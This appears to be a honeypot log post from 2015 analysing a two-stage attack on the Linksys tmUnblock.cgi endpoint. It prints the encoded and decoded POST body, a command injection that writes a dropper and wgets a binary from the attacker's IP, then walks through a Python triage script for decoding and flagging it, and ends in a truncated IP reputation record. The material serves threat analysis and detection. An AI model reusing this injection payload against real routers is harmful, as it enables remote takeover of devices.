Sunday, 26 July 2015

Two-stage nttpd attack - 119.42.100.97

BEGIN OF HTTP DATA:
2015-07-27 00:58:11
Source IP: 119.42.100.97
Country: TH RiskScore: 2.9 Malware: []
GET /tmUnblock.cgi HTTP/1.1


 END OF DATA

BEGIN OF HTTP DATA:
2015-07-27 00:58:51
Source IP: 119.42.100.97
Country: TH RiskScore: 2.9 Malware: []
POST /tmUnblock.cgi HTTP/1.1
content-length: 943

%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e%3d&%61%63%74%69%6f%6e%3d&%63%6f%6d%6d%69%74%3d&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74%6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%72%6d%20%2d%66%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%2e%6e%74%74%70%64%20%68%74%74%70%3a%2f%2f%31%31%39%2e%34%32%2e%31%30%30%2e%39%37%3a%33%33%34%34%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%2e%2f%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%2e%73%68%3b%2e%2f%2e%6e%74%74%70%64%2e%73%68%60&%53%74%61%72%74%45%50%49%3d%31
 END OF DATA

Which decodes to:
submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;echo "#!/bin/sh" > .nttpd.sh;echo "rm -f .nttpd" >> .nttpd.sh;echo "wget -O .nttpd http://119.42.100.97:3344" >> .nttpd.sh;echo "chmod +x .nttpd" >> .nttpd.sh;echo "./.nttpd" >> .nttpd.sh;chmod +x .nttpd.sh;./.nttpd.sh`&StartEPI=1
As you can see, the probe "GET /tmUnblock.cgi" got an answer the attacker's scanner accepted: 40 seconds later the same IP came back with a POST that carries a command injection in the ttcp_ip parameter. Everything inside the backticks runs in /tmp: it writes a dropper script .nttpd.sh that fetches a binary from the attacker's own address on port 3344, saves it as .nttpd, makes it executable and runs it. The first request is the scan, the second one plants nttpd; the stage-two binary is only fetched at run time, so it never appears in the HTTP capture itself.
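The payload above can be decoded and triaged mechanically. The following Python is an added example, not code from the original post: it rebuilds the captured body from the decoded line shown above (so the input is a reconstruction in the capture's encoding style, not a second capture), parses it, flags the field carrying shell metacharacters and pulls out the second-stage download URL as an indicator. One detail worth noticing in the capture: the attacker hex-encoded the "=" separators but left every "&" literal. A parser that splits before decoding (Python's parse_qs, for instance) therefore never sees a ttcp_ip field at all, while a parser that decodes the whole body first does. The triage reports that disagreement too, since benign clients have no reason to encode "=" while leaving "&" bare.

```python
#!/usr/bin/env python3
"""Decode and triage a percent-encoded tmUnblock.cgi POST body.

Added example, not code from the original post. The captured body is
reconstructed below from the decoded form shown in the post.
"""
import json
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The decoded POST body exactly as shown in the post.
DECODED = (
    'submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2'
    '&ttcp_ip=-h `cd /tmp;echo "#!/bin/sh" > .nttpd.sh;'
    'echo "rm -f .nttpd" >> .nttpd.sh;'
    'echo "wget -O .nttpd http://119.42.100.97:3344" >> .nttpd.sh;'
    'echo "chmod +x .nttpd" >> .nttpd.sh;echo "./.nttpd" >> .nttpd.sh;'
    'chmod +x .nttpd.sh;./.nttpd.sh`&StartEPI=1'
)


def encode_like_attacker(decoded):
    """Rebuild the wire form (constructed input, same style as the capture):
    every byte except '&' as lowercase %XX, so the '=' separators become %3d."""
    return ''.join(c if c == '&' else '%%%02x' % ord(c) for c in decoded)


RAW_BODY = encode_like_attacker(DECODED)

# Anything that lets a value escape the argument it was meant to be.
SHELL_META = re.compile(r'[`;|&]|\$\(')
URL_RE = re.compile(r'https?://[^\s"\'`;|&<>]+')


def parse_split_then_decode(raw):
    """Standard order (what urllib's parse_qs does): split on '&' and '=',
    then percent-decode each piece. Because '=' is encoded in this body,
    every chunk becomes a key with an empty value and no ttcp_ip field appears."""
    return {k: v[0] for k, v in parse_qs(raw, keep_blank_values=True).items()}


def parse_decode_then_split(raw):
    """Lenient order: percent-decode the whole body first, then split.
    This is the order under which the injected ttcp_ip value becomes visible."""
    fields = {}
    for pair in unquote(raw).split('&'):
        name, _, value = pair.partition('=')
        if name:
            fields[name] = value
    return fields


def triage(raw):
    """Return the fields carrying shell metacharacters, the second-stage
    download URLs found in them, and whether the two parsing orders disagree."""
    strict = parse_split_then_decode(raw)
    lenient = parse_decode_then_split(raw)
    report = {
        'parser_differential': set(strict) != set(lenient),
        'injected': {},
        'stage2': [],
    }
    for name, value in lenient.items():
        if SHELL_META.search(value):
            report['injected'][name] = value
            for url in URL_RE.findall(value):
                u = urlsplit(url)
                report['stage2'].append({'url': url, 'host': u.hostname, 'port': u.port})
    return report


if __name__ == '__main__':
    print(json.dumps(triage(RAW_BODY), indent=2))
```

Run it and it prints the report as JSON. Detection deliberately works on the decode-then-split view, because that is the only view in which the ttcp_ip value is a command; a request where the two views disagree is worth an alert on its own, independent of any signature for the command inside.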

I was still not able to get my hands on this code. If someone has it, please let me know.

IBM X-Force shows:
{
   "categoryDescriptions": {
      "Dynamic IPs": "This category contains IP addresses of dialup hosts and DSL lines.",
      "Spam": "This category lists IP addresses that were seen sending out spam."
   },
   "cats": {
      "Dynamic IPs": 86,
      "Spam": 29
   },
   "geo": {
      "country": "Thailand",
      "countrycode": "TH"
   },
   "ip": "119.42.100.97",
   "reason": "Spam sending activity",
   "reasonDescription": "This IP was involved in spam sending activities.",
   "score": 2.9,
   "subnets": [
      {
         "categoryDescriptions": {},
         "cats": {},
         "created": "2014-01-23T17:33:00.000Z",
         "geo": {
            "country": "Thailand",
            "countrycode": "TH"
         },